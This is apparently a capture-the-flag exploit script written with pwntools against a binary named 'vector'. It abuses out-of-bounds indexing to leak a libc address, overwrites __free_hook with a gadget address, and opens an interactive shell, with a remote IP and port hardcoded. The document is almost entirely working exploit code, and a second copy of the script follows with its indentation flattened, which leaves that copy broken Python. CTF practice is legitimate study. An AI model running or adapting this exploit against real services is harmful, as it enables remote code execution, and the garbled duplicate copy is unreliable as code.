hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./vector')
context(os='linux', arch=elf.arch)
#context(log_level='debug')  # output verbose log

RHOST = "34.97.74.235"
RPORT = 30001
LHOST = "127.0.0.1"
LPORT = 30001

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./vector'], gdbscript=gdbscript)
else:
    conn = process(['./vector'])
    # conn = process(['./vector'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)


def new(name):
    conn.sendlineafter('> ', '1')
    conn.sendlineafter('name:', str(name))

def concat(s1, s2, d):
    conn.sendlineafter('> ', '2')
    conn.sendlineafter('name:', str(s1))
    conn.sendlineafter('name:', str(s2))
    conn.sendlineafter('name:', str(d))

def push(name, val):
    conn.sendlineafter('> ', '3')
    conn.sendlineafter('name:', str(name))
    conn.sendlineafter('value:', str(val))

def set(name, idx, val):
    conn.sendlineafter('> ', '4')
    conn.sendlineafter('name:', str(name))
    conn.sendlineafter('index:', str(idx))
    conn.sendlineafter('value:', str(val))

def get(name, idx):
    conn.sendlineafter('> ', '5')
    conn.sendlineafter('name:', str(name))
    conn.sendlineafter('index:', str(idx))
# exploit
log.info('Pwning')

new(1)
new(2)

new(0)

concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)

new(3)
new(4)
for i in range(0x20):
    push(1, 0xff)

leak = 0
for i in range(6):
    get(2, 0x8c0+4+i)
    conn.recvuntil(' val: ')
    a = int(conn.recvline())
    if a < 0:
        a += 0x100
    leak = leak + (a << (i*8))
print hex(leak)
libc_base = leak - 0x3ebca0
dbg('libc_base')

free_hook = p64(libc_base + 0x3ed8e8-4)
for i in range(6):
    set(2, 0x64-8+i, ord(free_hook[i]))


set(2, 4+0x18, 0x00)
set(2, 4+0x18+1, 0x00)
set(2, 4+0x18+2, 0x10)
set(2, 4+0x18+5, 0xff)
set(2, 4+0x18+6, 0xff)
#set(2, 4+0x18+3, 0x10)
set(2, 4+0x38, 0x00)
set(2, 4+0x38+1, 0x00)
set(2, 4+0x38+2, 0x10)
set(2, 4+0x38+3, 0x10)
#new(5)

concat(3, 3, 6)
concat(3, 3, 7)

system = p64(libc_base + 0x4f440)
system = p64(libc_base + 0x4f322)
for i in range(6):
    push(7, ord(system[i]))

set(2, 4+0x38, ord('s'))
set(2, 4+0x38+1, ord('h'))
set(2, 4+0x38+2, 0)
raw_input()
concat(3, 3, 3)


conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./vector')
	context(os='linux', arch=elf.arch)
	#context(log_level='debug') # output verbose log

	RHOST = "34.97.74.235"
	RPORT = 30001
	LHOST = "127.0.0.1"
	LPORT = 30001

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./vector'], gdbscript=gdbscript)
	else:
	conn = process(['./vector'])
	# conn = process(['./vector'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)


	def new(name):
	conn.sendlineafter('> ', '1')
	conn.sendlineafter('name:', str(name))

	def concat(s1, s2, d):
	conn.sendlineafter('> ', '2')
	conn.sendlineafter('name:', str(s1))
	conn.sendlineafter('name:', str(s2))
	conn.sendlineafter('name:', str(d))

	def push(name, val):
	conn.sendlineafter('> ', '3')
	conn.sendlineafter('name:', str(name))
	conn.sendlineafter('value:', str(val))

	def set(name, idx, val):
	conn.sendlineafter('> ', '4')
	conn.sendlineafter('name:', str(name))
	conn.sendlineafter('index:', str(idx))
	conn.sendlineafter('value:', str(val))

	def get(name, idx):
	conn.sendlineafter('> ', '5')
	conn.sendlineafter('name:', str(name))
	conn.sendlineafter('index:', str(idx))
	# exploit
	log.info('Pwning')

	new(1)
	new(2)

	new(0)

	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)
	concat(0, 0, 0)

	new(3)
	new(4)
	for i in range(0x20):
	push(1, 0xff)

	leak = 0
	for i in range(6):
	get(2, 0x8c0+4+i)
	conn.recvuntil(' val: ')
	a = int(conn.recvline())
	if a < 0:
	a += 0x100
	leak = leak + (a << (i*8))
	print hex(leak)
	libc_base = leak - 0x3ebca0
	dbg('libc_base')

	free_hook = p64(libc_base + 0x3ed8e8-4)
	for i in range(6):
	set(2, 0x64-8+i, ord(free_hook[i]))


	set(2, 4+0x18, 0x00)
	set(2, 4+0x18+1, 0x00)
	set(2, 4+0x18+2, 0x10)
	set(2, 4+0x18+5, 0xff)
	set(2, 4+0x18+6, 0xff)
	#set(2, 4+0x18+3, 0x10)
	set(2, 4+0x38, 0x00)
	set(2, 4+0x38+1, 0x00)
	set(2, 4+0x38+2, 0x10)
	set(2, 4+0x38+3, 0x10)
	#new(5)

	concat(3, 3, 6)
	concat(3, 3, 7)

	system = p64(libc_base + 0x4f440)
	system = p64(libc_base + 0x4f322)
	for i in range(6):
	push(7, ord(system[i]))

	set(2, 4+0x38, ord('s'))
	set(2, 4+0x38+1, ord('h'))
	set(2, 4+0x38+2, 0)
	raw_input()
	concat(3, 3, 3)


	conn.interactive()